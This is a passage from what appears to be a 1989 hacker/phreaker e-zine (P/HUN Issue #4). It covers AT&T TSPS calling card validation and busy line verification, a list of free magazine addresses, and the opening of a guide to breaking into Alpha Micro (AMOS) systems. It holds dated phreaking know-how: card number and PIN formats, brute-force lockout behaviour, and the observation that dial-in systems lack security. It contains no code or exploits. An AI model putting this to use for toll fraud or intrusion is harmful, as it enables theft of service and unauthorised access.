a calling card is and how it would be utilized from a local office. The CCS and
|
|||
|
|
|||
|
BNS services are implemented in TSPS by CCIS hardware, SSAS and several
|
|||
|
|
|||
|
processing programs that will not be discussed in this file (ABEGN, ACALL,
|
|||
|
|
|||
|
ASEQ...) The CCS and BNS together provide for the customer an automated credit
|
|||
|
|
|||
|
card calling option that was initially implemented as an alternative to third
|
|||
|
|
|||
|
party billing, collect and large change calls.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
In order for the CCS and BNS to function, they require that each TSPS becomes
|
|||
|
|
|||
|
a node on the SPC network, which then allows access to a nationwide database of
|
|||
|
|
|||
|
Billing Validation Applications (BVA). The BVA currently consists of nodes
|
|||
|
|
|||
|
which are connected by CCIS, and are in turn made up of individual Billing
|
|||
|
|
|||
|
Validation Files (BVF). A BVF is a file of data that is needed by the SPC and
|
|||
|
|
|||
|
associated database software to process queries about the data. Each TSPS is
|
|||
|
|
|||
|
integrated into the SPC network and uses the CCIS direct signaling to access
|
|||
|
|
|||
|
the BVA. Connected in parallel to the BVA is the Network Call Denial (NCD),
|
|||
|
|
|||
|
which allows the call denial to AT&T customers with outstanding bills.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The CCS billing number consists of a 10 digit billing number and a 4 digit
|
|||
|
|
|||
|
PIN. There are two categories that a CCS billing number can fall into and
|
|||
|
|
|||
|
they are as follows:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 7.0.1) Directory Billing Number
|
|||
|
|
|||
|
=================================
|
|||
|
|
|||
|
- The billing number is usually the directory number to which the
|
|||
|
|
|||
|
card is billed, and is in the following format: NPA-NXX-XXXX :
|
|||
|
|
|||
|
Where the NPA represents Numbering Plan Area, N is a digit 2-9, and
|
|||
|
|
|||
|
X is a digit 0-9.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 7.0.2) Special Billing Number
|
|||
|
|
|||
|
===============================
|
|||
|
|
|||
|
- Wheras the typical CCS billing number is discribed above in 7.0.1,
|
|||
|
|
|||
|
here exists a special type of billing number that bills the card to
|
|||
|
|
|||
|
a special nondirectory billing number. The format for this type of
|
|||
|
|
|||
|
card is as follows: RAO-(0/1)-XX-XXXX : Where the RAO is the
|
|||
|
|
|||
|
Revenue Accounting Office code which assigns the billing number.
|
|||
|
|
|||
|
The X represents a digit 0-9.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The PIN is a 4 digit number in the format of NYYY, where N is a digit 2-9, and
|
|||
|
|
|||
|
Y a digit 0-9. Each PIN is designated upon assignment to the customer as
|
|||
|
|
|||
|
either restricted or unrestricted. An unrestricted PIN can place calls to all
|
|||
|
|
|||
|
destinations. If the called number is the same as the billing number, only the
|
|||
|
|
|||
|
4 digit PIN need be entered by the customer. A restricted PIN can only be used
|
|||
|
|
|||
|
for station calls to the billing number. NOTE: A special billing number
|
|||
|
|
|||
|
(section 7.0.2) can only have an unrestricted PIN.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The CCS can be broken down into two basic category of calling types and are as
|
|||
|
|
|||
|
follows:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
7.1 Customer Dialed CCS Call
|
|||
|
|
|||
|
=============================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The customer initiates the CCS sequence by dialing a 0 + Called Number. The
|
|||
|
|
|||
|
Called number can take the format of a 7 digit number, a 14 digit number or
|
|||
|
|
|||
|
01+ country code and national number. This information, as well the calling
|
|||
|
|
|||
|
number (originating) is received by TSPS from the CO. OST is then used to
|
|||
|
|
|||
|
determine whether CCS is available/given to the customer. Based on the
|
|||
|
|
|||
|
determined OST features (Does phone have Touch Tone? Is it a coin station?..),
|
|||
|
|
|||
|
TSPS either routes the call to an operator or provides an alerting tone and
|
|||
|
|
|||
|
announcement to prompt the customer for the CCS number (in the format discussed
|
|||
|
|
|||
|
in sec 7.0). Assuming no operator intervention, the CCS number is subjected to
|
|||
|
|
|||
|
a series of checks and queries detailed below. (sec 7.3)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
7.2 Operator Dialed CCS Call
|
|||
|
|
|||
|
============================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
There are several ways a customer can receive operator assistance in CCS
|
|||
|
|
|||
|
dialing.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 7.2.1) 0- call.
|
|||
|
|
|||
|
- 7.2.2) 0+ Called Number +0
|
|||
|
|
|||
|
- 7.2.3) 0+ Called Number +Switch-hook flash.
|
|||
|
|
|||
|
- 7.2.4) 0+ Called Number +No Action.
|
|||
|
|
|||
|
- 7.2.5) 0+ Called Number +OST feature information requiring operator
|
|||
|
|
|||
|
intervention. Example: Call placed from rotary phone...
|
|||
|
|
|||
|
- 7.2.6) 0+ octothorpe. A customer dials an octothorpe
|
|||
|
|
|||
|
( pound key "#") after the initial 0.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When the position is seized if the operator determines that a CCS call is
|
|||
|
|
|||
|
requested, the operator keys in the CCS number (or the PIN only) and call is
|
|||
|
|
|||
|
subjected to a series for checks for validity, detailed below (sec 7.3)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
7.2.1 Non-TSPS Dailed CCS Call
|
|||
|
|
|||
|
===============================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The TSPS operators do not serve all CCS users. Non-TSPS operators and
|
|||
|
|
|||
|
independent telephone companies also serve CCS customers, and must access the
|
|||
|
|
|||
|
BVA for validity checks.(Examples: mobile,marine,international...) This access
|
|||
|
|
|||
|
to the BVA is provided for cordboards and independent telephone companies by
|
|||
|
|
|||
|
reaching a nearby TSPS, via TSPS base unit inward trunks. A distant operator
|
|||
|
|
|||
|
may reach the BVA by any of the routing codes detailed in section 4.2.6, and
|
|||
|
|
|||
|
the CCS validation is subject to the same security checks detailed below. If
|
|||
|
|
|||
|
a non-TSPS operator dials either KP+(1161 or 1162)+ST, the operator hears a CCS
|
|||
|
|
|||
|
alert tone, and then has one minute in which to dial the 14 digit CCS number.
|
|||
|
|
|||
|
The TSPS initiates a format check, an APF check (see 7.3), and access the BVA
|
|||
|
|
|||
|
to determine the status of the CCS number in question. The following are the
|
|||
|
|
|||
|
different corresponding announcements which would follow:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Calling Card Service Number Accepted, PIN unrestricted
|
|||
|
|
|||
|
- Calling Card Service Number Accepted, PIN restricted
|
|||
|
|
|||
|
- Calling Card Service Number Accepted, RAO unknown
|
|||
|
|
|||
|
- Calling Card Service Number Rejected
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If a CCS number is accepted, the connection to the non-TSPS operator is
|
|||
|
|
|||
|
terminated by the TSPS. If a rejection message results, the operator will be
|
|||
|
|
|||
|
prompted by the alert tone and may attempt to redial the CCS.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
7.3 CCS Validation
|
|||
|
|
|||
|
===================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
After the CCS billing number is keyed in (either by customer, TSPS operator,
|
|||
|
|
|||
|
or independent operator) the All PINs Fail (APF) feature may cause the card to
|
|||
|
|
|||
|
be rejected and the call to be halted. The APF is a security feature designed
|
|||
|
|
|||
|
to frustrate attempts at discovering valid PINs by a brute force hack method
|
|||
|
|
|||
|
(trial and error). A list of CCS validation failures is maintained, which is
|
|||
|
|
|||
|
updated with both invalid billing numbers and calling numbers. When a number
|
|||
|
|
|||
|
of failures for a given billing number exceeds a specified threshold, in x
|
|||
|
|
|||
|
amount of time, all subsequent attempts are declared invalid for a certain
|
|||
|
|
|||
|
amount of time y (Lock Out Time). Even if the actual PIN is used during the
|
|||
|
|
|||
|
lockout time, the CCS number would be considered invalid, and the call process
|
|||
|
|
|||
|
would be halted.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
7.4 Billed Number Screening
|
|||
|
|
|||
|
============================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The BNS service applies to collect and third party billing calls placed
|
|||
|
|
|||
|
through a TSPS operator. The BVF contains information designating certain
|
|||
|
|
|||
|
numbers as "collect denied" or "bill-to-third denied". Each time an operator
|
|||
|
|
|||
|
attempts to place a collect or third party billing number a BVA and a NCD
|
|||
|
|
|||
|
inquiry are made.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
8.0 Busy Line Verification
|
|||
|
|
|||
|
===========================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
A dedicated network is provided to process BLV calls and traffic. This network
|
|||
|
|
|||
|
originates at the TSPS base office and connects through dedicated trunks to
|
|||
|
|
|||
|
toll, intertoll, and local offices. The equipment consists of the BLV trunk, a
|
|||
|
|
|||
|
TSPS-4 wire bridging repeater, a verification circuit at TSPS, InComing
|
|||
|
|
|||
|
Verification Trunks (ICVT), OutGoing Verification Trunks (OGVT) at both toll
|
|||
|
|
|||
|
and intertoll offices, and Incoming No Test Trunks (INTT) at local offices.
|
|||
|
|
|||
|
The TSPS gains access to a single local, toll, and/or intertoll office.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The initial request for a BLV appears as an position seizure to a TSPS operator
|
|||
|
|
|||
|
over an incoming trunk via a local office or as an inward trunk via a toll
|
|||
|
|
|||
|
office. The initial loop seized becomes the originating loop and is connect in
|
|||
|
|
|||
|
position via an idle TSPS loop. In that the originating loop cannot be
|
|||
|
|
|||
|
connected to the verification loop, the operator must switch between the two.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Security is maintained to insure that a customers privacy is not violated, and
|
|||
|
|
|||
|
consists of the following:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.0.1) Speech Scrambler at Console Level (not BLV trunk level).
|
|||
|
|
|||
|
- 8.0.2) Alert Tone Generator (ATG).
|
|||
|
|
|||
|
- 8.0.3) Translation of the NPA to 0XX or 1XX.
|
|||
|
|
|||
|
- 8.0.4) Dedicated BLV trunks.
|
|||
|
|
|||
|
- 8.0.5) Cross office security checks at toll offices.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
8.1 BLV Processing
|
|||
|
|
|||
|
===================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When a customer requests that a BLV be preformed on a certain number within
|
|||
|
|
|||
|
the TSPS's LAN the following actions are taken.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.1) The TSPS attempts to DDD the number in question , to confirm
|
|||
|
|
|||
|
that the number is indeed busy. This action is preformed so that if
|
|||
|
|
|||
|
in the event that an recorded error announcement is reached, the
|
|||
|
|
|||
|
operator may understand the nature of the error without the speech
|
|||
|
|
|||
|
scrambler interfering in quality.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2) If the line is confirmed to be busy and the customer requests
|
|||
|
|
|||
|
further action, the operator then attempts verification through the
|
|||
|
|
|||
|
BLV network. The operator then presses the VFY key, in which case an
|
|||
|
|
|||
|
attempt at a BLV will be made if and only if the following conditions
|
|||
|
|
|||
|
are met:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2.1) There is an idle loop at the position
|
|||
|
|
|||
|
===============================================
|
|||
|
|
|||
|
- This condition must be met because the BLV trunk must be
|
|||
|
|
|||
|
placed in a loop with the Traffic Service Position. If
|
|||
|
|
|||
|
there are no idle loops remaining the BLV cannot be
|
|||
|
|
|||
|
processed. This condition can be gotten around by the
|
|||
|
|
|||
|
operator pressing the POS TRSFR key, which causes all the
|
|||
|
|
|||
|
calls in the hold state to be transferred to loops on the
|
|||
|
|
|||
|
original operator position.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2.2) The call is on an incoming/inward trunk
|
|||
|
|
|||
|
================================================
|
|||
|
|
|||
|
- This insures that an operator cannot preform a BLV
|
|||
|
|
|||
|
without a originating customer request.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2.3) The called party is off-hook
|
|||
|
|
|||
|
======================================
|
|||
|
|
|||
|
- See 8.1.2.2
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2.4) The called number is a domestic number
|
|||
|
|
|||
|
================================================
|
|||
|
|
|||
|
- That is the called number cannot be an overseas number.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2.5) The call has no forward connection
|
|||
|
|
|||
|
============================================
|
|||
|
|
|||
|
- This ensures that the busy condition detected by the INTT
|
|||
|
|
|||
|
is not due to the connection of the calling party.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 8.1.2.6) The line number can be verified
|
|||
|
|
|||
|
=========================================
|
|||
|
|
|||
|
- This condition would fail if the local office is
|
|||
|
|
|||
|
not served by the BLV network...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- ..or the number in question is excluded from BLV calls
|
|||
|
|
|||
|
(Example: Emergency or Police Lines...)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
8.1.3) The BLV is preformed and the BLV trunk dropped by pressing
|
|||
|
|
|||
|
the REC MSG key for an incoming call or VFY for an inward call.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
9.0 Conclusion : Acknowledgements and References
|
|||
|
|
|||
|
=================================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I have assumed that the reader of this file has a general working knowledge
|
|||
|
|
|||
|
of phone systems and their associated terminology. As it is impossible to
|
|||
|
|
|||
|
please everyone, some readers will find this file too advanced while others
|
|||
|
|
|||
|
will find it lacking in several areas...too bad. This file has intentionally
|
|||
|
|
|||
|
*not* covered previously released information on TSPS found in files by other
|
|||
|
|
|||
|
authors, in an attempt to provide the phreak/hack community with another source
|
|||
|
|
|||
|
of information to be used in conjunction with the existing ones. The following
|
|||
|
|
|||
|
reading list is highly recommend for furthering ones knowledge on TSPS, and is
|
|||
|
|
|||
|
as follows:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Understanding TSPS Part 1: The Console - Written by The Marauder, LOD/H
|
|||
|
|
|||
|
Technical Journal: Issue No. 1, file #4.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Busy Line Verification Part 1 - Written by Phantom Phreaker, Phrack Vol 2,
|
|||
|
|
|||
|
Issue XI, file #10.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Busy Line Verification Part 2 - Written by Phantom Phreaker, Phrack Vol 2,
|
|||
|
|
|||
|
Issue XII, file #8
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Telephony Magazine
|
|||
|
|
|||
|
|
|||
|
|
|||
|
9.1 Acknowledgements
|
|||
|
|
|||
|
=====================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Eastwind...the Man Behind the Garbage Can...
|
|||
|
|
|||
|
- AT&T
|
|||
|
|
|||
|
- My Local RBOC...and all of the Trash that's fit to print
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 7 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
5/19/89 * Free Computer Magazines * 5/19/89
|
|||
|
|
|||
|
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+ Southern Cross +
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TPT Networking Management
|
|||
|
|
|||
|
1421 S. Sheridan
|
|||
|
|
|||
|
P.O. Box 21728
|
|||
|
|
|||
|
Tulsa, OK 74101-9977
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer Design Recommended
|
|||
|
|
|||
|
P.O. Box 2389
|
|||
|
|
|||
|
Tulsa, OK 74101-9933
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Scientific Computing & Automation Recommended
|
|||
|
|
|||
|
301 Gibraltar Drive
|
|||
|
|
|||
|
P.O. Box 608
|
|||
|
|
|||
|
Morris Plains, NJ 07950-0608
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Industrial Product Bulletin
|
|||
|
|
|||
|
301 Gibraltar Drive
|
|||
|
|
|||
|
P.O.Box 650
|
|||
|
|
|||
|
Morris Plains, NJ 07950-0650
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer Products
|
|||
|
|
|||
|
301 Gibraltar Drive
|
|||
|
|
|||
|
P.O. Box 601
|
|||
|
|
|||
|
Morris Plains, NJ 07950-9813
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Connect Journal of Computer Networking
|
|||
|
|
|||
|
3165 Kifer Rd.
|
|||
|
|
|||
|
P.O.Box 58145
|
|||
|
|
|||
|
Santa Clara, CA 95052
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Microcomputer Solutions Magazine
|
|||
|
|
|||
|
Intel Corporation
|
|||
|
|
|||
|
GRI-58
|
|||
|
|
|||
|
P.O. Box 58065
|
|||
|
|
|||
|
Santa Clara, CA 95052-8065
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Evaluation Engineering
|
|||
|
|
|||
|
2504 North Tamiami Trail
|
|||
|
|
|||
|
Nokomis, FL 34275-9987
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Electronics Recommended
|
|||
|
|
|||
|
P.O. Box No. 2713
|
|||
|
|
|||
|
Clinton, Iowa 52735
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Systems Integration
|
|||
|
|
|||
|
P.O. Box 5051
|
|||
|
|
|||
|
Denver, CO 80217
|
|||
|
|
|||
|
|
|||
|
|
|||
|
EDN Recommended
|
|||
|
|
|||
|
P.O. Box 5262
|
|||
|
|
|||
|
Denver, CO 80217-9865
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer Technology Review Recommended
|
|||
|
|
|||
|
West World Productions, Inc.
|
|||
|
|
|||
|
924 Westwood Blvd., Suite 650
|
|||
|
|
|||
|
Los Angeles, CA 90024-2910
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Microwave Journal Recommended
|
|||
|
|
|||
|
685 Canton Street
|
|||
|
|
|||
|
Norwood, MA 02062
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NASA Tech Briefs Recommended
|
|||
|
|
|||
|
Associated Business Publications
|
|||
|
|
|||
|
41 E. 42nd St., Suite 921
|
|||
|
|
|||
|
New York, NY 10164-0672
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer & Software News
|
|||
|
|
|||
|
A Lebhar-Friedman Publication
|
|||
|
|
|||
|
Grand Central Station
|
|||
|
|
|||
|
P.O. Box 3119
|
|||
|
|
|||
|
New York, NY 10164-0659
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Compliance Engineering Recommended
|
|||
|
|
|||
|
629 Massachusetts Avenue
|
|||
|
|
|||
|
Boxborough, MA 01719-9974
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Government Computer News
|
|||
|
|
|||
|
P.O. Box 3705
|
|||
|
|
|||
|
McLean, VA 22103
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Federal Computer Week
|
|||
|
|
|||
|
3110 Fairview Park Drive
|
|||
|
|
|||
|
Falls Church, VA 22042-4599
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Defense Electronics Recommended
|
|||
|
|
|||
|
EW Communications, Inc.
|
|||
|
|
|||
|
P.O. Box 50249
|
|||
|
|
|||
|
Palo Alto, CA 94303-9983
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Defense Computing Recommended
|
|||
|
|
|||
|
P.O. Box 5286
|
|||
|
|
|||
|
Pittsfield, MA 01203-5286
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Laurin Publishing Co., Inc.
|
|||
|
|
|||
|
Photonics Spectra
|
|||
|
|
|||
|
P.O. Box 2037
|
|||
|
|
|||
|
Pittsfield, MA 01202-9925
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer Graphics Review
|
|||
|
|
|||
|
P.O. Box 12950
|
|||
|
|
|||
|
Overland Park, KS 66212-0950
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Electronic Design Recommended
|
|||
|
|
|||
|
VNU Business Publications
|
|||
|
|
|||
|
P.O. Box 5194
|
|||
|
|
|||
|
Pittsfield, MA 01203-5194
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Electronic Products Recommended
|
|||
|
|
|||
|
P.O. Box 5317
|
|||
|
|
|||
|
Pittsfield, MA 01203-9899
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Software Magazine Not Recommended
|
|||
|
|
|||
|
P.O. Box 542
|
|||
|
|
|||
|
Winchester, MA 01890
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Specialized Products Company Recommended
|
|||
|
|
|||
|
2117 W. Walnut Hill Lane
|
|||
|
|
|||
|
Irving, TX 75038-9955
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The LAN Catalog & Black Box Catalog
|
|||
|
|
|||
|
Black Box Corporation
|
|||
|
|
|||
|
P.O. Box 12800
|
|||
|
|
|||
|
Pittsburgh, PA 15241-9912
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer-Aided Engineering
|
|||
|
|
|||
|
A Penton Publication
|
|||
|
|
|||
|
1100 Superior Avenue
|
|||
|
|
|||
|
Cleveland, OH 44197-8006
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PERX (catalog)
|
|||
|
|
|||
|
1730 S. Amphlett Blvd., Dept. 222
|
|||
|
|
|||
|
San Mateo, CA 94402
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Anasco (catalog)
|
|||
|
|
|||
|
Commerce Center Building
|
|||
|
|
|||
|
42A Cherry Hill Drive
|
|||
|
|
|||
|
Danvers, MA 01923-9916
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MetraByte Corporation (catalog) Recommended
|
|||
|
|
|||
|
440 Myles Standish Blvd.
|
|||
|
|
|||
|
Taunton, MA 02780
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Micro Networks (A/D catalog) Recommended
|
|||
|
|
|||
|
324 Clark Street
|
|||
|
|
|||
|
Worcester, MA 01606
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Programmer's Connection
|
|||
|
|
|||
|
7249 Whipple Ave. NW
|
|||
|
|
|||
|
North Canton, OH 44720
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Burr-Brown Corporation (catalog)
|
|||
|
|
|||
|
P.O. Box 11400
|
|||
|
|
|||
|
Tuscon, AZ 85734
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WAVETEK San Diego (catalog) Recommended
|
|||
|
|
|||
|
P.O. Box 85434
|
|||
|
|
|||
|
San Diego, CA 92138
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Digi-Key Corporation (catalog) Recommended
|
|||
|
|
|||
|
701 Brooks Avenue South
|
|||
|
|
|||
|
P.O. Box 677
|
|||
|
|
|||
|
Thief River Falls, MN 56701-0677
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Consumertronics Co. (catalog) Recommended
|
|||
|
|
|||
|
2011 Crescent Drive, P.O. Drawer 537
|
|||
|
|
|||
|
Alamogordo, NM 88310
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Time Motion Tools (catalog)
|
|||
|
|
|||
|
410 South Douglas Street
|
|||
|
|
|||
|
El Segundo, CA 90245
|
|||
|
|
|||
|
|
|||
|
|
|||
|
EXAR Corporation (modem design catalog)
|
|||
|
|
|||
|
750 Palomar Ave.
|
|||
|
|
|||
|
P.O. Box 3575
|
|||
|
|
|||
|
Sunnyvale, CA 94088
|
|||
|
|
|||
|
ATTN: Marketing Communications
|
|||
|
|
|||
|
Chilton's Instrumentation & Control News
|
|||
|
|
|||
|
Box 2006
|
|||
|
|
|||
|
Radnor, PA 19089-9975
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Communications Week
|
|||
|
|
|||
|
P.O. Box 2070
|
|||
|
|
|||
|
Manhasset, NY 11030
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer Systems News
|
|||
|
|
|||
|
CMP Publications, Inc.
|
|||
|
|
|||
|
600 Community Drive
|
|||
|
|
|||
|
Manhasset, NY 11030
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Electronic Engineering Times
|
|||
|
|
|||
|
Circulation Dep't.
|
|||
|
|
|||
|
Box 2010
|
|||
|
|
|||
|
Manhasset, NY 11030
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Network World
|
|||
|
|
|||
|
P.O. Box 1021
|
|||
|
|
|||
|
Southeastern, PA 19398-9979
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Digital Review
|
|||
|
|
|||
|
P.O. Box 40065
|
|||
|
|
|||
|
Philadelphia, PA 19106-9931
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Digital News
|
|||
|
|
|||
|
P.O. Box 593
|
|||
|
|
|||
|
Winchester, MA 01890-9953
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DEC Professional
|
|||
|
|
|||
|
P.O. Box 503
|
|||
|
|
|||
|
Spring House, PA 19477-0503
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Macintosh News
|
|||
|
|
|||
|
Circulations Dep't.
|
|||
|
|
|||
|
P.O. Box 2180
|
|||
|
|
|||
|
Manhasset, NY 11030
|
|||
|
|
|||
|
|
|||
|
|
|||
|
UNIX Today!
|
|||
|
|
|||
|
CMP Publications, Inc.
|
|||
|
|
|||
|
600 Community Drive
|
|||
|
|
|||
|
Manhasset, NY 11030
|
|||
|
|
|||
|
|
|||
|
|
|||
|
LAN Times
|
|||
|
|
|||
|
122 East 1700 South
|
|||
|
|
|||
|
P.O. Box 5900
|
|||
|
|
|||
|
Provo, UT 84601
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Electronic Business
|
|||
|
|
|||
|
275 Washington Street
|
|||
|
|
|||
|
Newton, MA 02158-1630
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PCNetwork
|
|||
|
|
|||
|
P.O. Box 457
|
|||
|
|
|||
|
Newton, NJ 07860
|
|||
|
|
|||
|
|
|||
|
|
|||
|
INFO World
|
|||
|
|
|||
|
P.O. Box 5994
|
|||
|
|
|||
|
Pasadena, CA 91107
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Reseller Management Not Recommended
|
|||
|
|
|||
|
301 Gibraltar Drive
|
|||
|
|
|||
|
P.O. Box 601
|
|||
|
|
|||
|
Morris Plains, NJ 07950-9811
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Computer Reseller News Not Recommended
|
|||
|
|
|||
|
CMP Publications, Inc.
|
|||
|
|
|||
|
600 Community Drive
|
|||
|
|
|||
|
Manhasset, NY 11030
|
|||
|
|
|||
|
|
|||
|
|
|||
|
This is a partial list of free computer magazines and newspapers of interest
|
|||
|
|
|||
|
to the hacker/phreaker community. Just ask for a free subscription form,
|
|||
|
|
|||
|
fill it out, and you'll have enough to read for a long time! (You also get to
|
|||
|
|
|||
|
stay on top of the "state" of the art) The recommended mags have articles,
|
|||
|
|
|||
|
products, schematics, and diagrams of particular interest and application
|
|||
|
|
|||
|
for most of the community. (You'll find that they're an education unto themselves.) Enjoy!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+SC+
|
|||
|
|
|||
|
Cruise Director
|
|||
|
|
|||
|
S.S. Phuntastic
|
|||
|
|
|||
|
(...lost in a sea of paper...)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|||
|
|
|||
|
+ P/HUN Issue #4, Volume 2: Phile 8 of 11 +
|
|||
|
|
|||
|
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +
|
|||
|
|
|||
|
+ A Guide to Hacking AMOS +
|
|||
|
|
|||
|
+ ----------------------- +
|
|||
|
|
|||
|
+ By NightCrawler +
|
|||
|
|
|||
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The Alpha Micro computer is a fairly easy system to understand, for
|
|||
|
|
|||
|
those of you familiar with VAX systems. The operating system (AMOS)
|
|||
|
|
|||
|
is a ripoff of the DEC stuff, so many commands are similar. This is
|
|||
|
|
|||
|
a guide on how to use the Alpha.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Background on security:
|
|||
|
|
|||
|
---------- -- ---------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
When the Alpha Micro leaves the factory, they do not have any type of
|
|||
|
|
|||
|
security feature built into it, except for certain higher end models,
|
|||
|
|
|||
|
which will be discussed later. Thus, if the user installs a modem
|
|||
|
|
|||
|
directly to the system, and you call in, you'll be at the OS level
|
|||
|
|
|||
|
already. Pretty easy, eh?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Due to the lack of a cursor display character, the pound sign (#) will
|
|||
|
|
|||
|
be used to represent the cursor throughout this document. The prompt
|
|||
|
|
|||
|
for AMOS is a period, which users refer to as the dot. Wnen you log on,
|
|||
|
|
|||
|
you'll see this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.#
|
|||
|
|
|||
|
|
|||
|
|
|||
|
At this point, you can type away and use the various accounts and
|
|||
|
|
|||
|
